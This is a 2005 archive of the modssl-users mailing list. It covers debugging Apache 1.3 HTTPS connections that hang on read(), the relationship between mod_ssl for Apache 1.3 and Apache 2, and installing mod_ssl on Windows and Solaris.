Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 00D97A8A8B; Tue, 25 Jan 2005 06:53:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enchanter.real-time.com (enchanter.real-time.com [208.20.202.11])
	by master.modssl.org (Postfix) with ESMTP id F2941A8A7D
	for ; Tue, 25 Jan 2005 06:53:24 +0100 (CET)
Received: from enchanter.real-time.com (fortress.tanners.org [65.165.41.129])
	by enchanter.real-time.com (8.12.10/8.12.10) with SMTP id j0P5r5Nf004652;
	Mon, 24 Jan 2005 23:53:06 -0600
Received: (nullmailer pid 4247 invoked by uid 1000);
	Tue, 25 Jan 2005 05:53:05 -0000
From: Bob Tanner 
Organization: Real Time Enterprises, Inc.
Subject: mod_ssl, block-on-read problem?
Date: Mon, 24 Jan 2005 23:53:03 -0600
User-Agent: KMail/1.7.1
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200501242353.04816@www.mn-linux.org.or.transmuter.real-time.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob Tanner 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Have the folling:

apache-1.3.33
libapache-mod-ssl-2.8.22
kernel-2.4.26-1-686-smp

Having a problem where https connections just won't die. Over time the
 process table files and box crawls or falls to its knees.

Installed debugging version of apache, here is gdb's backtrace showing the
block on read() called from mod_ssl's ssl_io_unregister() function.

(gdb) bt
#0  0x40048a98 in read () from /lib/libpthread.so.0
#1  0x40357a30 in ?? () from /usr/lib/apache/1.3/mod_ssl.so
#2  0x40340a95 in ssl_io_unregister () from /usr/lib/apache/1.3/mod_ssl.so
#3  0x080730ae in ap_hook_call_func (ap=0x0, he=0x3, hf=0x809cdac)
    at ap_hook.c:721
#4  0x08072d00 in ap_hook_call (
    hook=0xfffffe00 
) at ap_hook.c:382
                              ^^^^^^^^^^^^^^^^^^^^^^^ problem here too?

#5  0x080536b7 in ap_read (fb=0x809cd64, buf=0x809cdac, nbyte=4096)
    at buff.c:254
#6  0x08053bf3 in read_with_errors (fb=0x809cd64, buf=0x809cdac, nbyte=4096)
    at buff.c:298
#7  0x08053ec5 in ap_bgets (buff=0xbfffc240 "", n=8192, fb=0x809cd64)
    at buff.c:882
#8  0x08063423 in ap_getline (s=0xbfffc240 "", n=8192, in=0x809cd64, fold=0)
    at http_protocol.c:867
#9  0x0806367e in read_request_line (r=0x8095074) at http_protocol.c:991
#10 0x08063d13 in ap_read_request (conn=0x8336f3c) at http_protocol.c:1187
#11 0x08060a80 in child_main (child_num_arg=-512) at http_main.c:4862
#12 0x08060de7 in make_child (s=0xfffffe00, slot=5, now=-512)
    at http_main.c:5052
#13 0x080610c7 in perform_idle_server_maintenance () at http_main.c:5237
#14 0x08061a48 in standalone_main (argc=1, argv=0xbfffe514) at
http_main.c:5500
#15 0x08061ff8 in main (argc=1, argv=0xbfffe514) at http_main.c:5768

Using strace -p  I get:
read(3,

So, I'm pretty sure the block is happening on the read of file description 3.

Using lsof -n -p  I get and looking for FD 3, I see this:

apache.db 21547 www-data    3u  IPv4 16364769             TCP
xx.xxx.xxx.xxx:www->xxx.xxx.xxx.xxx:51923 (ESTABLISHED)

So I know fd 3 is an IPv4 client and the socket is established.

After collecting several days of data, the client IPs seem to be cache
servers.

Anyone know of a reason why the socket can't/won't close?

That's all the info I can think of reporting.

Anyone seen this problem before?

Since the problem doesn't happen with http, I -assume- this is a mod_ssl
problem, but if not, I'll try the apache mailing list.

Thanks.

-- 
Bob Tanner           | Phone : (952)943-8700
http://www.mn-linux.org, Minnesota, Linux | Fax   : (952)943-8500
Key fingerprint = AB15 0BDF BCDE 4369 5B42  1973 7CF1 A709 2CC1 B288
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 25 07:02:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2D3E3A8AB1; Tue, 25 Jan 2005 07:02:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enchanter.real-time.com (enchanter.real-time.com [208.20.202.11])
	by master.modssl.org (Postfix) with ESMTP id 243C0A8AA7
	for ; Tue, 25 Jan 2005 07:02:37 +0100 (CET)
Received: from enchanter.real-time.com (fortress.tanners.org [65.165.41.129])
	by enchanter.real-time.com (8.12.10/8.12.10) with SMTP id j0P62INf006357;
	Tue, 25 Jan 2005 00:02:18 -0600
Received: (nullmailer pid 4440 invoked by uid 1000);
	Tue, 25 Jan 2005 06:02:17 -0000
From: Bob Tanner 
Organization: Real Time Enterprises, Inc.
To: modssl-users@modssl.org
Subject: Re: mod_ssl, block-on-read problem?
Date: Tue, 25 Jan 2005 00:02:16 -0600
User-Agent: KMail/1.7.1
References: <200501242353.04816@www.mn-linux.org.or.transmuter.real-time.com>
In-Reply-To: <200501242353.04816@www.mn-linux.org.or.transmuter.real-time.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200501250002.17332@www.mn-linux.org.or.transmuter.real-time.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob Tanner 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Monday 24 January 2005 11:53 pm, Bob Tanner wrote:
> Have the folling:
>
> apache-1.3.33
> libapache-mod-ssl-2.8.22
> kernel-2.4.26-1-686-smp
>
> Having a problem where https connections just won't die. Over time the
>  process table files and box crawls or falls to its knees.
>
> Installed debugging version of apache, here is gdb's backtrace showing the
> block on read() called from mod_ssl's ssl_io_unregister() function.

This url sounds like the problem I'm having.

http://www.issociate.de/board/post/44974/

Any solution to the above?


-- 
Bob Tanner           | Phone : (952)943-8700
http://www.mn-linux.org, Minnesota, Linux | Fax   : (952)943-8500
Key fingerprint = AB15 0BDF BCDE 4369 5B42  1973 7CF1 A709 2CC1 B288
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 25 10:45:28 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 657D7A8A8F; Tue, 25 Jan 2005 10:45:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.skatteverket.se (smtp1.skatteverket.se [137.61.237.10])
	by master.modssl.org (Postfix) with ESMTP id 5F183A8A85
	for ; Tue, 25 Jan 2005 10:45:17 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by smtp3.rsv.se (Postfix) with ESMTP id 92FE99574
	for ; Tue, 25 Jan 2005 10:44:43 +0100 (MET)
Received: from smtp1.skatteverket.se ([127.0.0.1])
 by localhost (u30126 [127.0.0.1]) (amavisd-new, port 1025) with ESMTP
 id 16868-02 for ;
 Tue, 25 Jan 2005 10:44:41 +0100 (MET)
Date: Tue, 25 Jan 2005 10:44:35 +0100 (MET)
From: Anders Ringaby 
X-X-Sender:  
To: 
Subject: Re: mod_ssl, block-on-read problem?
In-Reply-To: <200501242353.04816@www.mn-linux.org.or.transmuter.real-time.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by amavisd-new at rsv.se
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anders Ringaby 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hello Bob.


> #4  0x08072d00 in ap_hook_call (
>     hook=0xfffffe00 
) at ap_hook.c:382
>                               ^^^^^^^^^^^^^^^^^^^^^^^ problem here too?


I don't know about this one ....


> Using strace -p  I get:
> read(3,
>
> Using lsof -n -p  I get and looking for FD 3, I see this:
>
> apache.db 21547 www-data    3u  IPv4 16364769             TCP
> xx.xxx.xxx.xxx:www->xxx.xxx.xxx.xxx:51923 (ESTABLISHED)


.... but when it comes to this one, I would say that the main reason
why a read() keeps hanging on a TCP socket is that the client or peer
has not shut down the connection, that is, the client or peer has not
performed a shutdown(), close() or exit().

Of course, you could argue that mod_ssl should have implemented a
timeout for conditions like that.

Maybe there is some kind of protocol problem here, in that mod_ssl is
still expecting data, while the client thinks there is no more data
to send, or maybe the client too is hanging in a read().


Regards

Anders



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 26 11:16:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C0D9CA8A4B; Wed, 26 Jan 2005 11:16:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41527.mail.yahoo.com (web41527.mail.yahoo.com [66.218.94.134])
	by master.modssl.org (Postfix) with SMTP id 8298FA8982
	for ; Wed, 26 Jan 2005 11:15:55 +0100 (CET)
Received: (qmail 82915 invoked by uid 60001); 26 Jan 2005 10:15:37 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=lKf5j1ZOznW/b+4YpNjB/TnGB+9AuVOZzK3lAlCyHanBUpVgFt4tCzFmbo27JqvoCr8mMD8sEZh03OGzL50QTe8gPEGSLBDwYasBKGUV7eBqHBcRXyaz9h/ys94Tbn8/vPBv+e3cdrB7qY5yHXpIkjzigVQmU2R9rLLPhA/zERU=  ;
Message-ID: <20050126101537.82913.qmail@web41527.mail.yahoo.com>
Received: from [128.87.251.170] by web41527.mail.yahoo.com via HTTP; Wed, 26 Jan 2005 02:15:37 PST
Date: Wed, 26 Jan 2005 02:15:37 -0800 (PST)
From: ColinB 
Subject: mod_ssl for Apache 2
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ColinB 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm slightly confused. The www.modssl.org site says that it is for
Apache 1 and makes no mention (that I could find) of Apache 2. Yet
there is a mod_ssl module mentioned on the Apache 2 web pages

   http://httpd.apache.org/docs-2.0/mod/mod_ssl.html

credited to the same author.

What is the relationship between mod_ssl for Apache 1 and Apache 2 ?

Why doesn't www.modssl.org say that it is for both Apache 1 and 2 ?


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 26 13:59:40 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A602AA8A4B; Wed, 26 Jan 2005 13:59:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 4AC6EA8982
	for ; Wed, 26 Jan 2005 13:59:35 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 76A522097
	for ; Wed, 26 Jan 2005 14:00:24 +0100 (CET)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 04646-02 for ;
 Wed, 26 Jan 2005 14:00:22 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 26C0E6892; Wed, 26 Jan 2005 14:00:22 +0100 (CET)
Date: Wed, 26 Jan 2005 14:00:22 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl for Apache 2
Message-ID: <20050126130022.GB4209@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <20050126101537.82913.qmail@web41527.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050126101537.82913.qmail@web41527.mail.yahoo.com>
X-Mailer: mutt
X-Virus-Scanned: by amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Jan 26, 2005 at 02:15:37AM -0800, ColinB wrote:
> What is the relationship between mod_ssl for Apache 1 and Apache 2 ?
> 
The mod_ssl in apache2 is based on the mod_ssl for Apache 1.3, but the
two versions are not the same module.

> Why doesn't www.modssl.org say that it is for both Apache 1 and 2 ?
> 
Because it isn't. The mod_ssl available at www.modssl.org is only for
Apache 1.3.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 26 15:46:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68630A8A4B; Wed, 26 Jan 2005 15:46:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from w1.paulbunyan.net (w1.PaulBunyan.net [209.191.200.5])
	by master.modssl.org (Postfix) with ESMTP id 9D19FA8982
	for ; Wed, 26 Jan 2005 15:46:36 +0100 (CET)
Received: from SysTech (ew142.ips.paulbunyan.net [209.191.213.142])
	by w1.paulbunyan.net (8.12.11/8.12.11) with SMTP id j0QEkAuR014149
	for ; Wed, 26 Jan 2005 08:46:12 -0600
Message-ID: <000601c503b5$caa804e0$ff00020a@SysTech>
From: "Tony Andrews" 
To: 
References: <20050126101537.82913.qmail@web41527.mail.yahoo.com> <20050126130022.GB4209@cr>
Subject: Re: mod_ssl for Apache 2
Date: Wed, 26 Jan 2005 08:46:11 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1409
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tony Andrews" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think I know the answer to this but what the heck...

I run apachectl -l and get...
core.c
worker.c
http_core.c
mod_so.c

No mod_ssl .  This is Apache 2.0.39.  Is there a way to get mod_ssl
installed on this server outside of re-installing Apache?

Thanks,
Tony Andrews

----- Original Message ----- 
From: "Mads Toftum" 
To: 
Sent: Wednesday, January 26, 2005 7:00 AM
Subject: Re: mod_ssl for Apache 2


> On Wed, Jan 26, 2005 at 02:15:37AM -0800, ColinB wrote:
> > What is the relationship between mod_ssl for Apache 1 and Apache 2 ?
> >
> The mod_ssl in apache2 is based on the mod_ssl for Apache 1.3, but the
> two versions are not the same module.
>
> > Why doesn't www.modssl.org say that it is for both Apache 1 and 2 ?
> >
> Because it isn't. The mod_ssl available at www.modssl.org is only for
> Apache 1.3.
>
> vh
>
> Mads Toftum
> -- 
> `Darn it, who spiked my coffee with water?!' - lwall
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 26 15:51:31 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 61CFDA8A5D; Wed, 26 Jan 2005 15:51:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 50F31A8982
	for ; Wed, 26 Jan 2005 15:51:24 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA03544;
	Wed, 26 Jan 2005 09:55:20 -0500
Date: Wed, 26 Jan 2005 09:55:19 -0500 (EST)
From: "R. DuFresne" 
To: Mads Toftum , ColinB 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl for Apache 2
In-Reply-To: <20050126130022.GB4209@cr>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 26 Jan 2005, Mads Toftum wrote:

> On Wed, Jan 26, 2005 at 02:15:37AM -0800, ColinB wrote:
> > What is the relationship between mod_ssl for Apache 1 and Apache 2 ?
> > 
> The mod_ssl in apache2 is based on the mod_ssl for Apache 1.3, but the
> two versions are not the same module.
> 
> > Why doesn't www.modssl.org say that it is for both Apache 1 and 2 ?
> > 
> Because it isn't. The mod_ssl available at www.modssl.org is only for
> Apache 1.3.
> 

Just to clarify some, mod_ssl is part of apache 2 by default, you just
turn it on with configure/compile options  while for
apache 1.3.x it is an addon package requiring a few other steps in the
configure/compile process and additional packages to link with.

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

...Love is the ultimate outlaw.  It just won't adhere to rules.
The most any of us can do is sign on as it's accomplice.  Instead
of vowing to honor and obey, maybe we should swear to aid and abet.
That would mean that security is out of the question.  The words
"make" and "stay" become inappropriate.  My love for you has no
strings attached.  I love you for free...
                        -Tom Robins 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 26 18:50:10 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 570ECA8A91; Wed, 26 Jan 2005 18:50:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from palrel13.hp.com (palrel13.hp.com [156.153.255.238])
	by master.modssl.org (Postfix) with ESMTP id BBB10A8963
	for ; Wed, 26 Jan 2005 18:50:05 +0100 (CET)
Received: from cacexg12.americas.cpqcorp.net (cacexg12.americas.cpqcorp.net [16.92.1.72])
	by palrel13.hp.com (Postfix) with ESMTP id 5D2531C0FA7D
	for ; Wed, 26 Jan 2005 09:49:47 -0800 (PST)
Received: from cacexc07.americas.cpqcorp.net ([16.92.1.32]) by cacexg12.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.211);
	 Wed, 26 Jan 2005 09:49:47 -0800
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: Apache 2 with mod_ssl for windows
Date: Wed, 26 Jan 2005 09:50:38 -0800
Message-ID: <85ECA15B7BB46944BFD4C73AEA55482402017703@cacexc07.americas.cpqcorp.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache 2 with mod_ssl for windows
Thread-Index: AcUDz4t1yl37xoORSgOzjk2w3S4g3Q==
From: "Lange, Bill Charles" 
To: 
X-OriginalArrivalTime: 26 Jan 2005 17:49:47.0336 (UTC) FILETIME=[6D187480:01C503CF]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lange, Bill Charles" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I've previously build Apache 1.3 for Windows with ssl support using
mod_ssl so I'm familiar with this process.

I looks like I need to do it for Apache 2 as well because I didn't see
the mod_ssl module in the windows pre-packaged install and the "no ssl"
at the end of the installer filename was a clue.

It looks like the mod_ssl source module is included with the apache
source distribution.

I am just looking for any advice before I start building Apach 2 + ssl.
Are there any things to look out for not mentioned in the apache docs
for instance?
Any references (other then the apache site) that would be helpful
for building Apache 2 ssl would also be appreciated.

Thanks,
Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 27 09:50:10 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8041A8A53; Thu, 27 Jan 2005 09:50:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41507.mail.yahoo.com (web41507.mail.yahoo.com [66.218.93.90])
	by master.modssl.org (Postfix) with SMTP id BA07DA8933
	for ; Thu, 27 Jan 2005 09:50:05 +0100 (CET)
Received: (qmail 82226 invoked by uid 60001); 27 Jan 2005 08:49:39 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=2JGpG4QhZkOe4SopKmM9LFV5SYOwNAmLwUaGXZE55AZ0KqpX6nUXMp8MA3OwDsjtoKmL5N8Amcslys12NdqS2zD1XHZxFU6olGs+agDZ1UsW98gVeSUy7aUPbhx89n/jaNTskd92LiG41rOPooScBBH3t7OmhbywB8eMI9VX1p4=  ;
Message-ID: <20050127084939.82224.qmail@web41507.mail.yahoo.com>
Received: from [128.87.251.170] by web41507.mail.yahoo.com via HTTP; Thu, 27 Jan 2005 00:49:39 PST
Date: Thu, 27 Jan 2005 00:49:39 -0800 (PST)
From: ColinB 
Subject: Re: mod_ssl for Apache 2
To: Mads Toftum 
Cc: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ColinB 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Thanks all. That clarifies the situation nicely.


	
		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - You care about security. So do we. 
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 27 11:14:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C2B35A8A53; Thu, 27 Jan 2005 11:14:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 5D281A8933
	for ; Thu, 27 Jan 2005 11:14:26 +0100 (CET)
Received: (qmail invoked by alias); 27 Jan 2005 10:14:04 -0000
Received: from pD95FBDB0.dip.t-dialin.net (EHLO pcmarkham) (217.95.189.176)
  by mail.gmx.net (mp029) with SMTP; 27 Jan 2005 11:14:04 +0100
X-Authenticated: #985284
From: "R. Markham" 
To: 
Subject: AW: Apache 2 with mod_ssl for windows
Date: Thu, 27 Jan 2005 11:14:01 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
In-Reply-To: <85ECA15B7BB46944BFD4C73AEA55482402017703@cacexc07.americas.cpqcorp.net>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcUDz4t1yl37xoORSgOzjk2w3S4g3QAh53pA
X-Y-GMX-Trusted: 0
Message-Id: <20050127101426.5D281A8933@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. Markham" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I did following
1. Install Apache 2.0.52 for windows with out SSL.
2. Unzip Apache 2.0.52 with SSL in C:\programme\apche
3. copy mod_ssl.so in c:\programme\apache group\apache\modules
4. Command C:\programme\Apache -i - -D SSL
 I was wondering there were errors coming from in c:\programme\apache
group\apache2\conf\ssl.conf

After correcting the error in ssl.conf all is OK.I controlled it with
openssl s_client -connect url:port

Regards

Richard

-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] Im
Auftrag von Lange, Bill Charles
Gesendet: Mittwoch, 26. Januar 2005 18:51
An: modssl-users@modssl.org
Betreff: Apache 2 with mod_ssl for windows


I've previously build Apache 1.3 for Windows with ssl support using
mod_ssl so I'm familiar with this process.

I looks like I need to do it for Apache 2 as well because I didn't see
the mod_ssl module in the windows pre-packaged install and the "no ssl"
at the end of the installer filename was a clue.

It looks like the mod_ssl source module is included with the apache
source distribution.

I am just looking for any advice before I start building Apach 2 + ssl.
Are there any things to look out for not mentioned in the apache docs
for instance?
Any references (other then the apache site) that would be helpful
for building Apache 2 ssl would also be appreciated.

Thanks,
Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 27 15:15:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AF344A8963; Thu, 27 Jan 2005 15:15:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rduex02.corp.stratech.com (outmail.stratech.com [216.26.242.2])
	by master.modssl.org (Postfix) with ESMTP id A8D41A8933
	for ; Thu, 27 Jan 2005 15:15:36 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5047A.6A3ACF8C"
Subject: apache for solaris
Date: Thu, 27 Jan 2005 09:13:46 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: apache for solaris
thread-index: AcUEep2tLXlr9mHLRf6gcNxR6ApCBg==
From: "Plantier, Spencer" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Plantier, Spencer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5047A.6A3ACF8C
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I am running Solaris 9 and installed apache through the package manager.
Did mod_ssl install with it?

Thanks
Spencer Plantier
System Network Administrator
=20
301 Gregson Dr
Cary, NC  27511
Office 919-379-8513
Cell    919-272-8833
spencer.plantier@stratech.com


------_=_NextPart_001_01C5047A.6A3ACF8C
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






apache for solaris





I am =
running Solaris 9 and installed apache through the package manager. Did =
mod_ssl install with it?



Thanks



Spencer =
Plantier



System Network Administrator



 



301 =
Gregson Dr



Cary, =
NC  27511



Office 919-379-8513



Cell    919-272-8833



spencer.plantier@stratech.com







------_=_NextPart_001_01C5047A.6A3ACF8C--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 28 02:44:44 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6BD08A8AA9; Fri, 28 Jan 2005 02:44:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
